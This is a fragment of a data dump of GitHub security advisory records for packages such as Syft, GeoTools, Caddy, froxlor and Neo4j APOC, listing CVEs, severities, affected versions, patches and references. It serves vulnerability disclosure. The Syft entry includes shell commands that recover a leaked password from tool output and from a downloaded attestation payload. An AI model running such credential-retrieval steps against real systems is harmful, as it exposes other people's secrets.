'https://github.com/dhowden/tag/issues/79'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/issues/80'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/4b595ed4fac79f467594aa92f8953f90f817116e'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/6b18201aa5c5535511802ddfb4e4117686b4866d'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/a92213460e4838490ce3066ef11dc823cdc1740e'}, {'type': 'WEB', 'url': 'https://github.com/dhowden/tag/commit/d52dcb253c63a153632bfee5f269dd411dcd8e96'}, {'type': 'PACKAGE', 'url': 'https://github.com/dhowden/tag'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0097'}]","{'cwe_ids': ['CWE-129'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:41:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-6p89-3p7c-qrhv,2023-02-23T21:52:54Z,2023-02-13T21:31:04Z,2023-02-15T15:36:00Z,['CVE-2022-48110'],Cross-site scripting in CKEditor5,"CKSource CKEditor5 35.4.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Full Featured CKEditor5 widget. NOTE: the vendor's position is that this is not a vulnerability. The CKEditor 5 documentation discusses that it is the responsibility of an integrator (who is adding CKEditor 5 functionality to a website) to choose the correct security settings for their use case. Also, safe default values are established (e.g., config.htmlEmbed.showPreviews is false).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '36.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48110'}, {'type': 'WEB', 'url': 'https://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor5'}, {'type': 'WEB', 'url': 'https://packetstormsecurity.com/files/170927/CKSource-CKEditor5-35.4.0-Cross-Site-Scripting.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:29:24Z', 'nvd_published_at': '2023-02-13T20:15:00Z'}" 1.4.0,GHSA-jp7v-3587-2956,2023-02-08T21:38:46Z,2023-02-08T21:38:46Z,,['CVE-2023-24827'],Credential disclosure in syft when SYFT_ATTEST_PASSWORD environment variable set,"A password disclosure flaw was found in Syft versions v0.69.0 and v0.69.1. This flaw leaks the password stored in the SYFT_ATTEST_PASSWORD environment variable. ### Impact The `SYFT_ATTEST_PASSWORD` environment variable is for the `syft attest` command to generate attested SBOMs for the given container image. This environment variable is used to decrypt the private key (provided with `syft attest --key `) during the signing process while generating an SBOM attestation. This vulnerability affects users running syft that have the `SYFT_ATTEST_PASSWORD` environment variable set with credentials (regardless of if the attest command is being used or not). Users that do not have the environment variable `SYFT_ATTEST_PASSWORD` set are not affected by this issue. The credentials are leaked in two ways: - in the syft logs when `-vv` or `-vvv` are used in the syft command (which is any log level >= `DEBUG`) - in the attestation or SBOM only when the `syft-json` format is used Note that as of v0.69.0 any generated attestations by the `syft attest` command are uploaded to the OCI registry (if you have write access to that registry) in the same way `cosign attach` is done. This means that any attestations generated for the affected versions of syft when the `SYFT_ATTEST_PASSWORD` environment variable was set would leak credentials in the attestation payload uploaded to the OCI registry. Example commands run from affected versions of syft that show the credential disclosure: ```bash $ SYFT_ATTEST_PASSWORD=123456 syft -o syft-json | grep 123456 # ""123456"" is in the output $ SYFT_ATTEST_PASSWORD=123456 syft attest -o syft-json $ cosign download attestation | jq -r '.payload' | base64 -d | grep 123456 # ""123456"" is in the output ``` ### Patches The patch has been released in v0.70.0. ### Workarounds There are no workarounds for this vulnerability. ### References Patch pull request: https://github.com/anchore/syft/pull/1538","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/anchore/syft'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.69.0'}, {'fixed': '0.70.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/anchore/syft/security/advisories/GHSA-jp7v-3587-2956'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24827'}, {'type': 'WEB', 'url': 'https://github.com/anchore/syft/commit/9995950c70e849f9921919faffbfcf46401f71f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/anchore/syft'}]","{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:38:46Z', 'nvd_published_at': '2023-02-07T01:15:00Z'}" 1.4.0,GHSA-33m6-q9v5-62r7,2023-02-07T22:57:53Z,2023-02-07T22:57:53Z,,['CVE-2021-3538'],github.com/satori/go.uuid has Predictable SIF UUID Identifiers,"### Impact The siftool new command produces predictable UUID identifiers due to insecure randomness in the version of the `github.com/satori/go.uuid` module used as a dependency. ### Patches A patch is available in version >= v1.2.1-0.20180404165556-75cca531ea76 of the module. Users are encouraged to upgrade. Fixed by https://github.com/hpcng/sif/pull/90 ### Workarounds Users passing CreateInfo struct should ensure the ID field is generated using a version of github.com/satori/go.uuid that is not vulnerable to this issue. Unfortunately, the latest tagged release is vulnerable to this issue. One way to obtain a non-vulnerable version is: `go get -u github.com/satori/go.uuid@v1.2.1-0.20180404165556-75cca531ea76` ### References https://github.com/satori/go.uuid/issues/73 ### For more information If you have any questions or comments about this advisory: Open an issue in https://github.com/hpcng/sif/issues","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/satori/go.uuid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.1-0.20180103161547-0ef6afb2f6cd'}, {'fixed': '1.2.1-0.20180404165556-75cca531ea76'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/apptainer/sif/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.1-0.20180103161547-0ef6afb2f6cd'}, {'fixed': '1.2.1-0.20180404165556-75cca531ea76'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hpcng/sif/security/advisories/GHSA-33m6-q9v5-62r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3538'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/issues/73'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/pull/75'}, {'type': 'WEB', 'url': 'https://github.com/satori/go.uuid/commit/75cca531ea763666bc46e531da3b4c3b95f64557'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1954376'}, {'type': 'PACKAGE', 'url': 'https://github.com/satori/go.uuid'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0244'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSATORIGOUUID-72488'}]","{'cwe_ids': ['CWE-338'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T22:57:53Z', 'nvd_published_at': '2021-06-02T14:15:00Z'}" 1.4.0,GHSA-m22q-97p5-79v2,2023-02-22T00:11:36Z,2023-02-21T00:30:20Z,,['CVE-2021-32851'],Mind-elixir Cross-site Scripting vulnerability,"Mind-elixir is a free, open source mind map core. Prior to version 0.18.1, mind-elixir is prone to cross-site scripting when handling untrusted menus. This issue is patched in version 0.18.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mind-elixir'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.18.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32851'}, {'type': 'WEB', 'url': 'https://github.com/ssshooter/mind-elixir-core/commit/073485269ac83af24371f35bd08507defa885655'}, {'type': 'PACKAGE', 'url': 'https://github.com/ssshooter/mind-elixir-core'}, {'type': 'WEB', 'url': 'https://github.com/ssshooter/mind-elixir-core/blob/79942a68b14c8875ab7d270b1ad25bfff351b04c/src/plugin/contextMenu.js#L13'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1047_Mind-elixir/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:11:36Z', 'nvd_published_at': '2023-02-20T22:15:00Z'}" 1.4.0,GHSA-6pm2-j2v8-h3cj,2023-02-15T17:39:56Z,2023-02-06T21:30:29Z,2023-02-09T22:03:51Z,['CVE-2023-0669'],Withdrawn: Fortra GoAnywhere MFT Deserialization of Untrusted Data vulnerability affects metasploit-framework,"## Withdrawn This advisory has been withdrawn because it was incorrectly associated with the metasploit-framework package, which is not affected by this CVE, and the actual vulnerable component does not fit within our supported ecosystems. This link is maintained to preserve external references. ## Original Description Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'metasploit-framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.33'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0669'}, {'type': 'WEB', 'url': 'https://github.com/rapid7/metasploit-framework/pull/17607'}, {'type': 'WEB', 'url': 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'}, {'type': 'WEB', 'url': 'https://duo.com/decipher/fortra-patches-actively-exploited-zero-day-in-goanywhere-mft'}, {'type': 'WEB', 'url': 'https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/rapid7/metasploit-framework'}, {'type': 'WEB', 'url': 'https://infosec.exchange/@briankrebs/109795710941843934'}, {'type': 'WEB', 'url': 'https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1'}, {'type': 'WEB', 'url': 'https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:39:43Z', 'nvd_published_at': '2023-02-06T20:15:00Z'}" 1.4.0,GHSA-vvjv-97j8-94xh,2023-03-10T18:34:20Z,2023-02-28T23:19:24Z,,['CVE-2023-22738'],vantage6 vulnerable to Improper Preservation of Permissions,"### Impact Assigning existing users to a different organization is currently possible. It may lead to unintended access: if a user from organization A is accidentally assigned to organization B, they will retain their permissions and therefore might be able to access stuff they should not be allowed to access. ### Patches Update to 3.8.0 ### Workarounds None ### References None ### For more information If you have any questions or comments about this advisory: * Email us at [vantage6@iknl.nl](mailto:vantage6@iknl.nl) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vantage6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/security/advisories/GHSA-vvjv-97j8-94xh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22738'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/commit/798aca1de142a4eca175ef51112e2235642f4f24'}, {'type': 'PACKAGE', 'url': 'https://github.com/vantage6/vantage6'}]","{'cwe_ids': ['CWE-281'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:19:24Z', 'nvd_published_at': '2023-03-01T21:15:00Z'}" 1.4.0,GHSA-99c3-qc2q-p94m,2023-02-22T19:16:06Z,2023-02-22T19:16:06Z,,['CVE-2023-25158'],GeoTools OGC Filter SQL Injection Vulnerabilities,"### Impact GeoTools includes support for OGC Filter expression language parsing, encoding and execution against a range of datastore. SQL Injection Vulnerabilities have been found when executing OGC Filters with JDBCDataStore implementations: 1. ``PropertyIsLike`` filter * Requires PostGIS DataStore with ""encode functions"" enabled * Or any JDBCDataStore (all relational databases) with String field (no mitigation) 3. ``strEndsWith`` function * Requires PostGIS DataStore with ""encode functions"" enabled 5. ``strStartsWith`` function * Requires PostGIS DataStore with ""encode functions"" enabled 6. ``FeatureId`` filter * Requires JDBCDataStore (all relational databases) with prepared statements disabled and table with String primary key (Oracle not affected, SQL Server and MySQL have no settings to enabled prepared statements, PostGIS does) 7. ``jsonArrayContains`` function * Requires PostGIS and Oracle DataStore with String or JSON field 8. ``DWithin`` filter * Happens only in Oracle DataStore, no mitigation ### Patches * GeoTools 28.2 * GeoTools 27.4 * GeoTools 26.7 * GeoTools 25.7 * GeoTools 24.7 ### Workarounds Partial mitigation: * In PostGIS DataStore disable ""encode functions"" * In any PostGIS enable ""prepared statements"" (only database with such settings) ```java Map params = new HashMap<>(); params.put(""dbtype"", ""postgis""); params.put(""host"", ""localhost""); params.put(""port"", 5432); params.put(""schema"", ""public""); params.put(""database"", ""database""); params.put(""user"", ""postgres""); params.put(""passwd"", ""postgres""); params.put(""preparedStatements"", true ); // mitigation params.put(""encode functions"", false ); // mitigation DataStore dataStore = DataStoreFinder.getDataStore(params); ``` ### References * [OGC Filter SQL Injection Vulnerabilities](https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf) (GeoServer) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '28.0'}, {'fixed': '28.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '27.0'}, {'fixed': '27.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '26.0'}, {'fixed': '26.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '25.0'}, {'fixed': '25.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.geotools:gt-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '24.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/geotools/geotools/security/advisories/GHSA-99c3-qc2q-p94m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25158'}, {'type': 'WEB', 'url': 'https://github.com/geotools/geotools/commit/64fb4c47f43ca818c2fe96a94651bff1b3b3ed2b'}, {'type': 'PACKAGE', 'url': 'https://github.com/geotools/geotools'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T19:16:06Z', 'nvd_published_at': '2023-02-21T21:15:00Z'}" 1.4.0,GHSA-9mwf-mw74-9cv5,2023-03-06T19:37:46Z,2023-02-24T12:31:20Z,,['CVE-2023-25696'],Apache Airflow Hive Provider Improper Input Validation vulnerability,Improper Input Validation vulnerability in the Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider versions before 5.1.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-apache-hive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25696'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29502'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/99g0qm56wmgdxmbtdsvhj4rdnxhpzpml'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:28Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}" 1.4.0,GHSA-jpxj-2jvg-6jv9,2023-02-16T23:34:17Z,2023-02-16T21:30:28Z,,['CVE-2023-0475'],Data Amplification in HashiCorp go-getter,HashiCorp go-getter up to 1.6.2 and 2.1.1 is vulnerable to decompression bombs. Fixed in 1.7.0 and 2.2.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-getter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/go-getter/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0475'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-getter/commit/0edab85348271c843782993345b07b1ac98912e6'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/go-getter/commit/78e6721a2a76266718dc92c3c03c1571dffdefdc'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-4-go-getter-vulnerable-to-denial-of-service-via-malicious-compressed-archive/50125'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/go-getter'}]","{'cwe_ids': ['CWE-409'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:34:17Z', 'nvd_published_at': '2023-02-16T19:15:00Z'}" 1.4.0,GHSA-8g23-2q5p-8866,2023-03-06T21:57:35Z,2023-02-24T12:31:20Z,,['CVE-2023-25691'],Apache Airflow Google Provider Improper Input Validation vulnerability,Improper Input Validation vulnerability in the Apache Airflow Google Provider. This issue affects Apache Airflow Google Provider versions before 8.10.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-google'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25691'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29497'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/zdr8ovfttbh7kj0lydgcw88tbt2nmkcy'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:25:46Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}" 1.4.0,GHSA-66p8-j459-rq63,2023-02-10T23:11:01Z,2023-02-10T23:11:01Z,,['CVE-2023-25168'],Pterodactyl Wings contains UNIX Symbolic Link (Symlink) Following resulting in deletion of files and directories on the host system,"### Impact This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can be used to delete files and directories recursively on the host system. This vulnerability can be combined with [`GHSA-p8r3-83r8-jwj5`](https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5) to overwrite files on the host system. In order to use this exploit, an attacker must have an existing ""server"" allocated and controlled by Wings. Information on how the exploitation of this vulnerability works will be released on February 24th, 2023 in North America. ### Patches This vulnerability has been resolved in version `v1.11.4` of Wings, and has been back-ported to the 1.7 release series in `v1.7.4`. Anyone running `v1.11.x` should upgrade to `v1.11.4` and anyone running `v1.7.x` should upgrade to `v1.7.4`. ### Workarounds None at this time.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-66p8-j459-rq63'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-p8r3-83r8-jwj5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25168'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/commit/429ac62dba22997a278bc709df5ac00a5a25d83d'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}]","{'cwe_ids': ['CWE-59'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:11:01Z', 'nvd_published_at': '2023-02-09T00:16:00Z'}" 1.4.0,GHSA-qpm3-vr34-h8w8,2023-02-16T21:55:13Z,2023-02-07T00:30:24Z,,['CVE-2022-28923'],Open Redirect in Caddy,Caddy v2.4.6 was discovered to contain an open redirection vulnerability which allows attackers to redirect users to phishing websites via crafted URLs,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/caddyserver/caddy/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.0-beta.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-28923'}, {'type': 'WEB', 'url': 'https://github.com/caddyserver/caddy/commit/78b5356f2b1945a90de1ef7f2c7669d82098edbd'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-qpm3-vr34-h8w8'}, {'type': 'PACKAGE', 'url': 'https://github.com/caddyserver/caddy'}, {'type': 'WEB', 'url': 'https://lednerb.de/en/publications/responsible-disclosure/caddy-open-redirect-vulnerability/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1567'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:35:34Z', 'nvd_published_at': '2023-02-06T23:15:00Z'}" 1.4.0,GHSA-w695-p3j5-hrj9,2023-03-06T19:38:25Z,2023-02-24T12:31:20Z,,['CVE-2023-25956'],Apache Airflow AWS Provider Generates Error Message Containing Sensitive Information,Generation of Error Message Containing Sensitive Information vulnerability in the Apache Airflow AWS Provider. This issue affects Apache Airflow AWS Provider versions before 7.2.1.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-amazon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25956'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/29587'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/07pl9y4gdpw2c6rzqm77dvkm2z2kb5gv'}]","{'cwe_ids': ['CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:24:59Z', 'nvd_published_at': '2023-02-24T12:15:00Z'}" 1.4.0,GHSA-9fqc-9cpr-w73q,2023-02-10T22:06:31Z,2023-02-04T03:30:25Z,,['CVE-2023-0671'],froxlor is vulnerable to privilege escalation from customer to root via directory-options,Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0671'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/0034681412057fef2dfe9cce9f8a6e3321f52edc'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c2a84917-7ac0-4169-81c1-b61e617023de'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T19:33:16Z', 'nvd_published_at': '2023-02-04T01:15:00Z'}" 1.4.0,GHSA-9vx8-f5c4-862x,2023-03-31T14:27:12Z,2023-02-24T17:39:18Z,,[],XML External Entity (XXE) vulnerability in apoc.import.graphml,"### Impact A XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be resolved. The XML parser used by the apoc.import.graphml procedure was not configured in a secure way and therefore allowed this. External entities can be used to read local files, send HTTP requests, and perform denial-of-service attacks on the application. Abusing the XXE vulnerability enabled assessors to read local files remotely. Although with the level of privileges assessors had this was limited to one-line files. With the ability to write to the database, any file could have been read. Additionally, assessors noted, with local testing, the server could be crashed by passing in improperly formatted XML. ### Patches The users should aim to use the latest released version compatible with their Neo4j version. The minimum versions containing patch for this vulnerability is 4.4.0.14. ### Workarounds If you cannot upgrade the library, you can control the [allowlist](https://neo4j.com/docs/operations-manual/current/reference/configuration-settings/#config_dbms.security.procedures.allowlist) of the procedures that can be used in your system. ### For more information If you have any questions or comments about this advisory: * Open an issue in [neo4j-apoc-procedures](https://github.com/neo4j-contrib/neo4j-apoc-procedures) * Email us at [security@neo4j.com](mailto:security@neo4j.com) ### Credits We want to publicly recognise the contribution of Christopher Schneider – State Farm. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0.14'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.neo4j.procedure:apoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/security/advisories/GHSA-9vx8-f5c4-862x'}, {'type': 'WEB', 'url': 'https://github.com/neo4j/apoc/security/advisories/GHSA-6wxg-wh7f-rqpr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23926'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/commit/c3e2a29020497acf9417879f38e8af4e8c6d5783'}, {'type': 'PACKAGE', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures'}, {'type': 'WEB', 'url': 'https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/tag/4.4.0.14'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T17:39:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-4jx2-hvqw-93j9,2023-03-02T18:39:18Z,2023-02-20T12:30:18Z,,['CVE-2016-15026'],dd-plist XML External Entitly vulnerability,A vulnerability was found in 3breadt dd-plist 1.17 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. An attack has to be approached locally. Upgrading to version 1.18 is able to address this issue. The name of the patch is 8c954e8d9f6f6863729e50105a8abf3f87fff74c. It is recommended to upgrade the affected component. VDB-221486 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.plist:dd-plist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-15026'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/pull/26'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/commit/8c954e8d9f6f6863729e50105a8abf3f87fff74c'}, 